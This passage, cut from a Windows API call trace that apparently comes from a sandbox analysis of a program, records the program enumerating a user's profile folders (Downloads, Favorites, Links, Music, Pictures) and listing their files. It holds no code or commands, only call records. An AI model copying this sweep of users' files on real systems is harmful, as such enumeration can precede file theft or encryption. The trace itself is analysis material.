(pszPath="C:\\Users\\") returned="Users\\" [0209.933] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.933] PathFindFileNameW (pszPath="") returned="" [0209.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.933] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.933] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.933] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0209.934] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.934] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.934] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0209.934] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.934] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.934] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.934] PathFindFileNameW (pszPath="") returned="" [0209.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0209.934] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0209.935] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.935] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.935] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0209.935] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.935] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.935] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.935] PathFindFileNameW (pszPath="") returned="" [0209.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0209.935] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0209.935] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.936] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0209.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.936] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.936] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.936] PathFindFileNameW (pszPath="") returned="" [0209.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0209.936] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0209.936] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.936] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.936] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.936] PathFindFileNameW (pszPath="") returned="" [0209.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9a2c7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9a2c7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9a2c7e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9a2c7e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ccb5200, ftCreationTime.dwHighDateTime=0x1d5e7a2, ftLastAccessTime.dwLowDateTime=0xd3ad3c50, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xd3ad3c50, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x7f32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q3Twxk8PpGFDv1c.mp3", cAlternateFileName="Q3TWXK~1.MP3")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf370260, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x41352620, ftLastAccessTime.dwHighDateTime=0x1d5dcf8, ftLastWriteTime.dwLowDateTime=0x41352620, ftLastWriteTime.dwHighDateTime=0x1d5dcf8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tCN4", cAlternateFileName="")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa348480, ftCreationTime.dwHighDateTime=0x1d5dc86, ftLastAccessTime.dwLowDateTime=0xed26df20, ftLastAccessTime.dwHighDateTime=0x1d5e61f, ftLastWriteTime.dwLowDateTime=0xed26df20, ftLastWriteTime.dwHighDateTime=0x1d5e61f, nFileSizeHigh=0x0, nFileSizeLow=0xb1bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zlzVO4InXVjGcjVW.m4a", cAlternateFileName="ZLZVO4~1.M4A")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 1 [0209.937] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0 [0209.937] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.937] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.937] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0209.937] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.937] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.937] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.937] PathFindFileNameW (pszPath="") returned="" [0209.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0xffffffff [0209.938] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.938] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0209.938] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.938] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.938] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.938] PathFindFileNameW (pszPath="") returned="" [0209.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef93c130, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd5f0ea80, ftLastAccessTime.dwHighDateTime=0x1d5e1ba, ftLastWriteTime.dwLowDateTime=0xd5f0ea80, ftLastWriteTime.dwHighDateTime=0x1d5e1ba, nFileSizeHigh=0x0, nFileSizeLow=0xa3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZvUOWEfZtl8FASO.wav", cAlternateFileName="ZVUOWE~1.WAV")) returned 0xffffffff [0209.938] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.938] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0209.938] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.938] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.939] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.939] PathFindFileNameW (pszPath="") returned="" [0209.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9c67c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9c67c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9c67c80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9c67c80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b04f3d0, ftCreationTime.dwHighDateTime=0x1d5e735, ftLastAccessTime.dwLowDateTime=0x6b4a1590, ftLastAccessTime.dwHighDateTime=0x1d5e4f7, ftLastWriteTime.dwLowDateTime=0x6b4a1590, ftLastWriteTime.dwHighDateTime=0x1d5e4f7, nFileSizeHigh=0x0, nFileSizeLow=0xf00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5r-EikMshU.gif", cAlternateFileName="5R-EIK~1.GIF")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1404ccf0, ftCreationTime.dwHighDateTime=0x1d5ddac, ftLastAccessTime.dwLowDateTime=0x422db3c0, ftLastAccessTime.dwHighDateTime=0x1d5e447, ftLastWriteTime.dwLowDateTime=0x422db3c0, ftLastWriteTime.dwHighDateTime=0x1d5e447, nFileSizeHigh=0x0, nFileSizeLow=0xe0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l3X0rIq0ylmfa7Fmqc.gif", cAlternateFileName="L3X0RI~1.GIF")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e5a7e80, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0xd99fda40, ftLastAccessTime.dwHighDateTime=0x1d5e392, ftLastWriteTime.dwLowDateTime=0xd99fda40, ftLastWriteTime.dwHighDateTime=0x1d5e392, nFileSizeHigh=0x0, nFileSizeLow=0xca6b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lMQl3vtPbVw.bmp", cAlternateFileName="LMQL3V~1.BMP")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1460ff0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0xce6c4f80, ftLastAccessTime.dwHighDateTime=0x1d5e083, ftLastWriteTime.dwLowDateTime=0xce6c4f80, ftLastWriteTime.dwHighDateTime=0x1d5e083, nFileSizeHigh=0x0, nFileSizeLow=0x0, 